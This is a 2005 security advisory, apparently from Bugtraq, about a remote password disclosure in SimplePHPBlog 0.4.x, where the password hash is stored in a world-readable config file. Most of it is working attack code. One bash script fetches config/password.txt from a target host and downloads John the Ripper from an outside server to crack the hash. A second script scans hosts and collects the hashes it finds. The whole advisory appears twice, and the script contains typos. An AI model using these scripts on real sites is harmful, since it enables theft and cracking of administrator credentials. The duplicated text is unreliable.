QUOTE
Authors......... pjphem && LazyCrs
Date............ 07/07/2005
Vendor.......... www.simplephpblog.com
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure
o The Problem:
--------------
bash-3.00# cat install02.php
$result = create_folder( 'config' );
bash-3.00# cat sb_login.php
// If there's no password file then need to redirect them.
$passFile = 'config/password.txt';
----------------------------------------------------------------------------------
function create_password ( $user, $pass ) {
// Generate and store password hash
$mypasswd = $user.$pass;
$hashed = crypt($mypasswd);
// Save File
$filename = 'config/password.txt';
$result = sb_write_file( $filename, $hashed );
----------------------------------------------------------------------------------
function check_password ( $user, $pass ) {
// Check password against hashed password file
$passFile = 'config/password.txt';
$hashed = sb_read_file( $passFile );
bash-3.00# ls -l `pwd` |grep config
drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config
o Proof of concept:
-------------------
bash-3.00$ cat 0xfuck-phpblog.sh
#!/bin/bash
#####################################################
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# © COPYRIGHT 0xpjply security guru group, 2005
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
#####################################################
echo ""
echo ""
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := "
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo ""
echo " c0de by pjphem "
echo ""
echo ""
echo " vulnerabili Simple php blog 0.4.4 <= "
echo ""
echo ""
echo -n "inserisci un hostname: " ; read hostname ;
echo -n "inserisci dir: " ; read dir ;
echo ""
echo "[*] praparando l'ambiente..."
mkdir 0xpjply
cd 0xpjply
echo -t3 "[*] OK!"
echo "[*] Cattura password..."
wget http://$hostname/$dir/config/password.txt
echo "[*] OK!"
echo ""
echo ""
echo "Show password: (md5)"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] "
read Q
if [ $Q = y ];
then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz
else
exit 1;
fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[*] Dowloading password.."
echo ""
wget http://$hostname/$dir/config/password.txt
echo ""
echo "Done!"
echo ""
echo "STARING John for decript password.. enJoy"
./jonh password.txt
echo ""
echo ""
bash-3.00$
bash-3.00$ cat 0xfuck-phpblog-scanner.sh
#!/bin/bash
#
# Simple tester for phpblog
#
# phpblog 0.4.4 <=
#
#######################################
echo "host , directory blog: (ex. test.it blog)"
read HOST BLOG
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3
bash-3.00$
Date............ 07/07/2005
Vendor.......... www.simplephpblog.com
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure
o The Problem:
--------------
bash-3.00# cat install02.php
$result = create_folder( 'config' );
bash-3.00# cat sb_login.php
// If there's no password file then need to redirect them.
$passFile = 'config/password.txt';
----------------------------------------------------------------------------------
function create_password ( $user, $pass ) {
// Generate and store password hash
$mypasswd = $user.$pass;
$hashed = crypt($mypasswd);
// Save File
$filename = 'config/password.txt';
$result = sb_write_file( $filename, $hashed );
----------------------------------------------------------------------------------
function check_password ( $user, $pass ) {
// Check password against hashed password file
$passFile = 'config/password.txt';
$hashed = sb_read_file( $passFile );
bash-3.00# ls -l `pwd` |grep config
drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config
o Proof of concept:
-------------------
bash-3.00$ cat 0xfuck-phpblog.sh
#!/bin/bash
#####################################################
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# © COPYRIGHT 0xpjply security guru group, 2005
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
#####################################################
echo ""
echo ""
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := "
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo ""
echo " c0de by pjphem "
echo ""
echo ""
echo " vulnerabili Simple php blog 0.4.4 <= "
echo ""
echo ""
echo -n "inserisci un hostname: " ; read hostname ;
echo -n "inserisci dir: " ; read dir ;
echo ""
echo "[*] praparando l'ambiente..."
mkdir 0xpjply
cd 0xpjply
echo -t3 "[*] OK!"
echo "[*] Cattura password..."
wget http://$hostname/$dir/config/password.txt
echo "[*] OK!"
echo ""
echo ""
echo "Show password: (md5)"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] "
read Q
if [ $Q = y ];
then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz
else
exit 1;
fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[*] Dowloading password.."
echo ""
wget http://$hostname/$dir/config/password.txt
echo ""
echo "Done!"
echo ""
echo "STARING John for decript password.. enJoy"
./jonh password.txt
echo ""
echo ""
bash-3.00$
bash-3.00$ cat 0xfuck-phpblog-scanner.sh
#!/bin/bash
#
# Simple tester for phpblog
#
# phpblog 0.4.4 <=
#
#######################################
echo "host , directory blog: (ex. test.it blog)"
read HOST BLOG
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3
bash-3.00$
Source: http://seclists.org/lists/bugtraq/2005/Jul/0099.html
